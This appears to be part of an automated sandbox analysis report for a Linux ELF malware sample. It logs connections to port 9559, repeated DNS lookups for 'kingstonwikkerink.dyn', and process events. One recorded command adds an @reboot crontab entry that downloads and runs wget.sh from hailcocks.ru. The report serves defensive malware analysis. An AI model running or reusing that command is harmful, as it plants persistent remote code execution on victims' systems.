                                                                      Nov 17, 2024 05:41:18.560231924 CET410149559192.168.2.23194.87.30.79
                                                                      Nov 17, 2024 05:41:18.565773010 CET955941014194.87.30.79192.168.2.23
                                                                      Nov 17, 2024 05:41:18.566375017 CET410149559192.168.2.23194.87.30.79
                                                                      Nov 17, 2024 05:41:18.572535038 CET955941014194.87.30.79192.168.2.23
                                                                      Nov 17, 2024 05:41:19.538858891 CET955941014194.87.30.79192.168.2.23
                                                                      Nov 17, 2024 05:41:19.539457083 CET410149559192.168.2.23194.87.30.79
                                                                      Nov 17, 2024 05:41:19.539457083 CET410149559192.168.2.23194.87.30.79
                                                                      Nov 17, 2024 05:41:25.746829987 CET604109559192.168.2.23193.233.193.45
                                                                      Nov 17, 2024 05:41:25.752070904 CET955960410193.233.193.45192.168.2.23
                                                                      Nov 17, 2024 05:41:25.752397060 CET604109559192.168.2.23193.233.193.45
                                                                      Nov 17, 2024 05:41:25.752397060 CET604109559192.168.2.23193.233.193.45
                                                                      Nov 17, 2024 05:41:25.758152008 CET955960410193.233.193.45192.168.2.23
                                                                      Nov 17, 2024 05:41:25.758492947 CET604109559192.168.2.23193.233.193.45
                                                                      Nov 17, 2024 05:41:25.764303923 CET955960410193.233.193.45192.168.2.23
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 17, 2024 05:37:56.099666119 CET3297353192.168.2.23137.220.52.23
                                                                      Nov 17, 2024 05:37:56.339787006 CET5198453192.168.2.23137.220.52.23
                                                                      Nov 17, 2024 05:38:01.103455067 CET4564453192.168.2.2364.176.6.48
                                                                      Nov 17, 2024 05:38:01.344283104 CET5525953192.168.2.2364.176.6.48
                                                                      Nov 17, 2024 05:38:06.105657101 CET5639553192.168.2.23178.254.22.166
                                                                      Nov 17, 2024 05:38:06.350018024 CET5230053192.168.2.23178.254.22.166
                                                                      Nov 17, 2024 05:38:11.109148026 CET5100453192.168.2.23168.235.111.72
                                                                      Nov 17, 2024 05:38:11.197032928 CET5351004168.235.111.72192.168.2.23
                                                                      Nov 17, 2024 05:38:11.352998018 CET3956853192.168.2.23168.235.111.72
                                                                      Nov 17, 2024 05:38:11.442398071 CET5339568168.235.111.72192.168.2.23
                                                                      Nov 17, 2024 05:38:16.788114071 CET5129153192.168.2.2381.169.136.222
                                                                      Nov 17, 2024 05:38:16.815871000 CET535129181.169.136.222192.168.2.23
                                                                      Nov 17, 2024 05:38:17.343801022 CET5176453192.168.2.2381.169.136.222
                                                                      Nov 17, 2024 05:38:17.371542931 CET535176481.169.136.222192.168.2.23
                                                                      Nov 17, 2024 05:38:22.684416056 CET3696953192.168.2.23202.61.197.122
                                                                      Nov 17, 2024 05:38:22.695282936 CET5336969202.61.197.122192.168.2.23
                                                                      Nov 17, 2024 05:38:28.777559996 CET5398053192.168.2.2370.34.254.19
                                                                      Nov 17, 2024 05:38:30.867204905 CET5191253192.168.2.23202.61.197.122
                                                                      Nov 17, 2024 05:38:30.878082037 CET5351912202.61.197.122192.168.2.23
                                                                      Nov 17, 2024 05:38:33.784451962 CET5114653192.168.2.23194.36.144.87
                                                                      Nov 17, 2024 05:38:33.795098066 CET5351146194.36.144.87192.168.2.23
                                                                      Nov 17, 2024 05:38:33.796652079 CET4473453192.168.2.23137.220.52.23
                                                                      Nov 17, 2024 05:38:36.853727102 CET3852853192.168.2.2370.34.254.19
                                                                      Nov 17, 2024 05:38:38.804609060 CET5932353192.168.2.23168.235.111.72
                                                                      Nov 17, 2024 05:38:38.892720938 CET5359323168.235.111.72192.168.2.23
                                                                      Nov 17, 2024 05:38:41.860110998 CET5729653192.168.2.23194.36.144.87
                                                                      Nov 17, 2024 05:38:41.871232033 CET5357296194.36.144.87192.168.2.23
                                                                      Nov 17, 2024 05:38:41.873537064 CET3374353192.168.2.23137.220.52.23
                                                                      Nov 17, 2024 05:38:44.855079889 CET5080753192.168.2.23152.53.15.127
                                                                      Nov 17, 2024 05:38:44.866327047 CET5350807152.53.15.127192.168.2.23
                                                                      Nov 17, 2024 05:38:44.869710922 CET4621353192.168.2.23194.36.144.87
                                                                      Nov 17, 2024 05:38:44.880588055 CET5346213194.36.144.87192.168.2.23
                                                                      Nov 17, 2024 05:38:44.883495092 CET5047753192.168.2.23139.84.165.176
                                                                      Nov 17, 2024 05:38:46.878884077 CET5549453192.168.2.23168.235.111.72
                                                                      Nov 17, 2024 05:38:46.967449903 CET5355494168.235.111.72192.168.2.23
                                                                      Nov 17, 2024 05:38:49.889156103 CET5577453192.168.2.2364.176.6.48
                                                                      Nov 17, 2024 05:38:53.438951015 CET3953053192.168.2.23152.53.15.127
                                                                      Nov 17, 2024 05:38:53.449443102 CET5339530152.53.15.127192.168.2.23
                                                                      Nov 17, 2024 05:38:53.451036930 CET4621353192.168.2.23194.36.144.87
                                                                      Nov 17, 2024 05:38:53.461437941 CET5346213194.36.144.87192.168.2.23
                                                                      Nov 17, 2024 05:38:53.463221073 CET3314253192.168.2.23139.84.165.176
                                                                      Nov 17, 2024 05:38:58.470781088 CET4319253192.168.2.2364.176.6.48
                                                                      Nov 17, 2024 05:39:00.854245901 CET4741953192.168.2.23178.254.22.166
                                                                      Nov 17, 2024 05:39:05.860722065 CET4170753192.168.2.23168.235.111.72
                                                                      Nov 17, 2024 05:39:05.949034929 CET5341707168.235.111.72192.168.2.23
                                                                      Nov 17, 2024 05:39:10.099689007 CET5165953192.168.2.23178.254.22.166
                                                                      Nov 17, 2024 05:39:11.960540056 CET3951453192.168.2.23217.160.70.42
                                                                      Nov 17, 2024 05:39:11.988686085 CET5339514217.160.70.42192.168.2.23
                                                                      Nov 17, 2024 05:39:15.107866049 CET5325353192.168.2.23168.235.111.72
                                                                      Nov 17, 2024 05:39:15.196177006 CET5353253168.235.111.72192.168.2.23
                                                                      Nov 17, 2024 05:39:17.878464937 CET5202053192.168.2.23168.235.111.72
                                                                      Nov 17, 2024 05:39:17.968534946 CET5352020168.235.111.72192.168.2.23
                                                                      Nov 17, 2024 05:39:21.085335016 CET5844853192.168.2.23217.160.70.42
                                                                      Nov 17, 2024 05:39:21.113085032 CET5358448217.160.70.42192.168.2.23
                                                                      Nov 17, 2024 05:39:27.293713093 CET3409653192.168.2.23168.235.111.72
                                                                      Nov 17, 2024 05:39:27.381669998 CET5334096168.235.111.72192.168.2.23
                                                                      Nov 17, 2024 05:39:31.453370094 CET3513353192.168.2.23185.181.61.24
                                                                      Nov 17, 2024 05:39:31.486896038 CET5335133185.181.61.24192.168.2.23
                                                                      Nov 17, 2024 05:39:40.874448061 CET5836853192.168.2.23185.181.61.24
                                                                      Nov 17, 2024 05:39:40.908368111 CET5358368185.181.61.24192.168.2.23
                                                                      Nov 17, 2024 05:39:44.985913992 CET4676053192.168.2.23185.181.61.24
                                                                      Nov 17, 2024 05:39:45.019700050 CET5346760185.181.61.24192.168.2.23
                                                                      Nov 17, 2024 05:39:46.972815037 CET5159453192.168.2.23185.181.61.24
                                                                      Nov 17, 2024 05:39:47.007016897 CET5351594185.181.61.24192.168.2.23
                                                                      Nov 17, 2024 05:39:54.256990910 CET3958453192.168.2.23202.61.197.122
                                                                      Nov 17, 2024 05:39:54.269651890 CET5339584202.61.197.122192.168.2.23
                                                                      Nov 17, 2024 05:40:00.496047020 CET4309753192.168.2.23202.61.197.122
                                                                      Nov 17, 2024 05:40:00.507353067 CET5343097202.61.197.122192.168.2.23
                                                                      Nov 17, 2024 05:40:06.464157104 CET4527453192.168.2.23194.36.144.87
                                                                      Nov 17, 2024 05:40:06.476317883 CET5345274194.36.144.87192.168.2.23
                                                                      Nov 17, 2024 05:40:06.478609085 CET5640253192.168.2.23168.235.111.72
                                                                      Nov 17, 2024 05:40:06.570729971 CET5356402168.235.111.72192.168.2.23
                                                                      Nov 17, 2024 05:40:07.760801077 CET5520953192.168.2.23194.36.144.87
                                                                      Nov 17, 2024 05:40:07.771814108 CET5355209194.36.144.87192.168.2.23
                                                                      Nov 17, 2024 05:40:07.774061918 CET4420953192.168.2.23168.235.111.72
                                                                      Nov 17, 2024 05:40:07.867214918 CET5344209168.235.111.72192.168.2.23
                                                                      Nov 17, 2024 05:40:14.311610937 CET4450653192.168.2.2365.21.1.106
                                                                      Nov 17, 2024 05:40:14.338500977 CET534450665.21.1.106192.168.2.23
                                                                      Nov 17, 2024 05:40:14.342267036 CET5363053192.168.2.2364.176.6.48
                                                                      Nov 17, 2024 05:40:19.350760937 CET5133053192.168.2.2351.158.108.203
                                                                      Nov 17, 2024 05:40:19.367209911 CET535133051.158.108.203192.168.2.23
                                                                      Nov 17, 2024 05:40:19.371225119 CET4086253192.168.2.2380.152.203.134
                                                                      Nov 17, 2024 05:40:19.424640894 CET534086280.152.203.134192.168.2.23
                                                                      Nov 17, 2024 05:40:20.077440977 CET3789953192.168.2.2365.21.1.106
                                                                      Nov 17, 2024 05:40:20.106304884 CET533789965.21.1.106192.168.2.23
                                                                      Nov 17, 2024 05:40:20.109710932 CET6045653192.168.2.2364.176.6.48
                                                                      Nov 17, 2024 05:40:25.113949060 CET4388153192.168.2.2351.158.108.203
                                                                      Nov 17, 2024 05:40:25.129915953 CET534388151.158.108.203192.168.2.23
                                                                      Nov 17, 2024 05:40:25.134181976 CET5017153192.168.2.2380.152.203.134
                                                                      Nov 17, 2024 05:40:25.499787092 CET535017180.152.203.134192.168.2.23
                                                                      Nov 17, 2024 05:40:32.111623049 CET4312553192.168.2.23217.160.70.42
                                                                      Nov 17, 2024 05:40:32.139122963 CET5343125217.160.70.42192.168.2.23
                                                                      Nov 17, 2024 05:40:32.922411919 CET3521553192.168.2.23217.160.70.42
                                                                      Nov 17, 2024 05:40:32.949969053 CET5335215217.160.70.42192.168.2.23
                                                                      Nov 17, 2024 05:40:45.637001991 CET4863753192.168.2.23194.36.144.87
                                                                      Nov 17, 2024 05:40:45.648392916 CET5348637194.36.144.87192.168.2.23
                                                                      Nov 17, 2024 05:40:45.650096893 CET5238153192.168.2.23178.254.22.166
                                                                      Nov 17, 2024 05:40:46.455530882 CET4454853192.168.2.23194.36.144.87
                                                                      Nov 17, 2024 05:40:46.466434956 CET5344548194.36.144.87192.168.2.23
                                                                      Nov 17, 2024 05:40:46.468935013 CET5742653192.168.2.23178.254.22.166
                                                                      Nov 17, 2024 05:40:50.658421040 CET5856653192.168.2.2381.169.136.222
                                                                      Nov 17, 2024 05:40:50.686872005 CET535856681.169.136.222192.168.2.23
                                                                      Nov 17, 2024 05:40:51.476824045 CET4425053192.168.2.2381.169.136.222
                                                                      Nov 17, 2024 05:40:51.505321026 CET534425081.169.136.222192.168.2.23
                                                                      Nov 17, 2024 05:40:57.153965950 CET5900153192.168.2.2381.169.136.222
                                                                      Nov 17, 2024 05:40:57.204858065 CET535900181.169.136.222192.168.2.23
                                                                      Nov 17, 2024 05:40:57.497087002 CET3460953192.168.2.2381.169.136.222
                                                                      Nov 17, 2024 05:40:57.525485039 CET533460981.169.136.222192.168.2.23
                                                                      Nov 17, 2024 05:41:03.498655081 CET4392453192.168.2.2370.34.254.19
                                                                      Nov 17, 2024 05:41:08.508306980 CET6033453192.168.2.235.161.109.23
                                                                      Nov 17, 2024 05:41:10.696543932 CET3823553192.168.2.2370.34.254.19
                                                                      Nov 17, 2024 05:41:13.514655113 CET3593653192.168.2.23139.84.165.176
                                                                      Nov 17, 2024 05:41:15.703195095 CET6013253192.168.2.235.161.109.23
                                                                      Nov 17, 2024 05:41:18.522726059 CET5417453192.168.2.2365.21.1.106
                                                                      Nov 17, 2024 05:41:18.550760984 CET535417465.21.1.106192.168.2.23
                                                                      Nov 17, 2024 05:41:20.710402012 CET4335753192.168.2.23139.84.165.176
                                                                      Nov 17, 2024 05:41:24.544348001 CET4566253192.168.2.235.161.109.23
                                                                      Nov 17, 2024 05:41:25.717056036 CET4301853192.168.2.2365.21.1.106
                                                                      Nov 17, 2024 05:41:25.744293928 CET534301865.21.1.106192.168.2.23
                                                                      Nov 17, 2024 05:41:29.550312996 CET4460153192.168.2.2364.176.6.48
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 17, 2024 05:37:56.099666119 CET192.168.2.23137.220.52.230x6232Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:37:56.339787006 CET192.168.2.23137.220.52.230x6232Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:01.103455067 CET192.168.2.2364.176.6.480xf7b8Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:01.344283104 CET192.168.2.2364.176.6.480xf7b8Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:06.105657101 CET192.168.2.23178.254.22.1660xfb63Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:06.350018024 CET192.168.2.23178.254.22.1660xfb63Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:11.109148026 CET192.168.2.23168.235.111.720x3c26Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:11.352998018 CET192.168.2.23168.235.111.720x3c26Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:16.788114071 CET192.168.2.2381.169.136.2220xabb1Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:17.343801022 CET192.168.2.2381.169.136.2220xabb1Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:22.684416056 CET192.168.2.23202.61.197.1220x3c7eStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:28.777559996 CET192.168.2.2370.34.254.190x5e91Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:30.867204905 CET192.168.2.23202.61.197.1220x3c7eStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:33.784451962 CET192.168.2.23194.36.144.870x5816Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:33.796652079 CET192.168.2.23137.220.52.230x1c1bStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:36.853727102 CET192.168.2.2370.34.254.190x5e91Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:38.804609060 CET192.168.2.23168.235.111.720x191cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:41.860110998 CET192.168.2.23194.36.144.870x5816Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:41.873537064 CET192.168.2.23137.220.52.230x1c1bStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:44.855079889 CET192.168.2.23152.53.15.1270x103fStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:44.869710922 CET192.168.2.23194.36.144.870xe5abStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:44.883495092 CET192.168.2.23139.84.165.1760x2fb9Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:46.878884077 CET192.168.2.23168.235.111.720x191cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:49.889156103 CET192.168.2.2364.176.6.480x17adStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:53.438951015 CET192.168.2.23152.53.15.1270x103fStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:53.451036930 CET192.168.2.23194.36.144.870xe5abStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:53.463221073 CET192.168.2.23139.84.165.1760x2fb9Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:38:58.470781088 CET192.168.2.2364.176.6.480x17adStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:39:00.854245901 CET192.168.2.23178.254.22.1660xe711Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:39:05.860722065 CET192.168.2.23168.235.111.720xa222Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:39:10.099689007 CET192.168.2.23178.254.22.1660xe711Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:39:11.960540056 CET192.168.2.23217.160.70.420x3fabStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:39:15.107866049 CET192.168.2.23168.235.111.720xa222Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:39:17.878464937 CET192.168.2.23168.235.111.720x9b2aStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:39:21.085335016 CET192.168.2.23217.160.70.420x3fabStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:39:27.293713093 CET192.168.2.23168.235.111.720x9b2aStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:39:31.453370094 CET192.168.2.23185.181.61.240x1595Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:39:40.874448061 CET192.168.2.23185.181.61.240x1595Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:39:44.985913992 CET192.168.2.23185.181.61.240x3572Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:39:46.972815037 CET192.168.2.23185.181.61.240x3572Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:39:54.256990910 CET192.168.2.23202.61.197.1220xaf7Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:00.496047020 CET192.168.2.23202.61.197.1220xaf7Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:06.464157104 CET192.168.2.23194.36.144.870x3ca2Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:06.478609085 CET192.168.2.23168.235.111.720xebd3Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:07.760801077 CET192.168.2.23194.36.144.870x3ca2Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:07.774061918 CET192.168.2.23168.235.111.720xebd3Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:14.311610937 CET192.168.2.2365.21.1.1060x91a1Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:14.342267036 CET192.168.2.2364.176.6.480x22d7Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:19.350760937 CET192.168.2.2351.158.108.2030x9072Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:19.371225119 CET192.168.2.2380.152.203.1340x2c18Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:20.077440977 CET192.168.2.2365.21.1.1060x91a1Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:20.109710932 CET192.168.2.2364.176.6.480x22d7Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:25.113949060 CET192.168.2.2351.158.108.2030x9072Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:25.134181976 CET192.168.2.2380.152.203.1340x2c18Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:32.111623049 CET192.168.2.23217.160.70.420xeaeStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:32.922411919 CET192.168.2.23217.160.70.420xeaeStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:45.637001991 CET192.168.2.23194.36.144.870xe8bfStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:45.650096893 CET192.168.2.23178.254.22.1660x62daStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:46.455530882 CET192.168.2.23194.36.144.870xe8bfStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:46.468935013 CET192.168.2.23178.254.22.1660x62daStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:50.658421040 CET192.168.2.2381.169.136.2220x4feStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:51.476824045 CET192.168.2.2381.169.136.2220x4feStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:57.153965950 CET192.168.2.2381.169.136.2220x7bbStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:40:57.497087002 CET192.168.2.2381.169.136.2220x7bbStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:41:03.498655081 CET192.168.2.2370.34.254.190x6570Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:41:08.508306980 CET192.168.2.235.161.109.230x1ba6Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:41:10.696543932 CET192.168.2.2370.34.254.190x6570Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:41:13.514655113 CET192.168.2.23139.84.165.1760x3922Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:41:15.703195095 CET192.168.2.235.161.109.230x1ba6Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:41:18.522726059 CET192.168.2.2365.21.1.1060xc8d8Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:41:20.710402012 CET192.168.2.23139.84.165.1760x3922Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:41:24.544348001 CET192.168.2.235.161.109.230x2079Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:41:25.717056036 CET192.168.2.2365.21.1.1060xc8d8Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                      Nov 17, 2024 05:41:29.550312996 CET192.168.2.2364.176.6.480x7bdfStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false

                                                                      System Behavior

                                                                      Start time (UTC):04:37:54
                                                                      Start date (UTC):17/11/2024
                                                                      Path:/tmp/ppc.elf
                                                                      Arguments:/tmp/ppc.elf
                                                                      File size:5388968 bytes
                                                                      MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                      Start time (UTC):04:37:54
                                                                      Start date (UTC):17/11/2024
                                                                      Path:/tmp/ppc.elf
                                                                      Arguments:-
                                                                      File size:5388968 bytes
                                                                      MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                      Start time (UTC):04:37:54
                                                                      Start date (UTC):17/11/2024
                                                                      Path:/bin/sh
                                                                      Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                                                      File size:129816 bytes
                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                      Start time (UTC):04:37:54
                                                                      Start date (UTC):17/11/2024
                                                                      Path:/bin/sh
                                                                      Arguments:-
                                                                      File size:129816 bytes
                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                      Start time (UTC):04:37:54
                                                                      Start date (UTC):17/11/2024
                                                                      Path:/bin/sh
                                                                      Arguments:-
                                                                      File size:129816 bytes
                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                      Start time (UTC):04:37:54
                                                                      Start date (UTC):17/11/2024
                                                                      Path:/usr/bin/crontab
                                                                      Arguments:crontab -l
                                                                      File size:43720 bytes
                                                                      MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                      Start time (UTC):04:37:54
                                                                      Start date (UTC):17/11/2024
                                                                      Path:/bin/sh
                                                                      Arguments:-
                                                                      File size:129816 bytes
                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                      Start time (UTC):04:37:54
                                                                      Start date (UTC):17/11/2024
                                                                      Path:/usr/bin/crontab
                                                                      Arguments:crontab -
                                                                      File size:43720 bytes
                                                                      MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                      Start time (UTC):04:37:55
                                                                      Start date (UTC):17/11/2024
                                                                      Path:/tmp/ppc.elf
                                                                      Arguments:-
                                                                      File size:5388968 bytes
                                                                      MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                      Start time (UTC):04:37:55
                                                                      Start date (UTC):17/11/2024
                                                                      Path:/tmp/ppc.elf
                                                                      Arguments:-
                                                                      File size:5388968 bytes
                                                                      MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                      Start time (UTC):04:37:55
                                                                      Start date (UTC):17/11/2024
                                                                      Path:/tmp/ppc.elf
                                                                      Arguments:-
                                                                      File size:5388968 bytes
                                                                      MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                      Start time (UTC):04:37:55
                                                                      Start date (UTC):17/11/2024
                                                                      Path:/tmp/ppc.elf
                                                                      Arguments:-
                                                                      File size:5388968 bytes
                                                                      MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                      Start time (UTC):04:37:55
                                                                      Start date (UTC):17/11/2024
                                                                      Path:/tmp/ppc.elf
                                                                      Arguments:-
                                                                      File size:5388968 bytes
                                                                      MD5 hash:ae65271c943d3451b7f026d1fadccea6